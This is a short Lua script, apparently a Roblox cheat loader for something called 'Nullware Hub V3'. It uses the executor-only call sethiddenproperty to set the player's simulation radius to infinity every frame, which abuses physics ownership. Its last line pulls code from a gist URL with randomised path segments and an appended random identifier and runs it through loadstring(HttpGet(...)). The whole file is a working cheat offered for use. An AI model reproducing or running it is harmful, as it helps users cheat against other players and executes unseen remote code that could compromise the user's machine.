1. local LocalPlayer = game:GetService("Players").LocalPlayer
  2. local Heartbeat = game:GetService("RunService").Heartbeat
  3. Heartbeat:Connect(function()
  4. LocalPlayer.MaximumSimulationRadius = math.huge
  5. sethiddenproperty(LocalPlayer, "SimulationRadius", math.huge)
  6. end)
  7. -- Script above is a fix to limbs falling --
  8. -- Nullware Hub V3 | --
  9. getgenv().Theme = "Purple" -- To change the UI Theme, set this to one of the following options: "Red", "Purple", "Blue", "Green", "Yellow"
  10. loadstring(game:HttpGet("https://gist.githubusercontent.com/M6HqVBcddw2qaN4s/2d722888a388017c18028cd434c43a25/raw/dcccf1027fe4b90780e47767aaf584389c9d7771/EULma3fU90PUOKUn?identifier=".. (function()local a=""for b=1,256 do local c=math.random(1,3)a=a..string.char(c==1 and math.random(48,57)or c==2 and math.random(97,122)or c==3 and math.random(65,90))end;return a end)()))()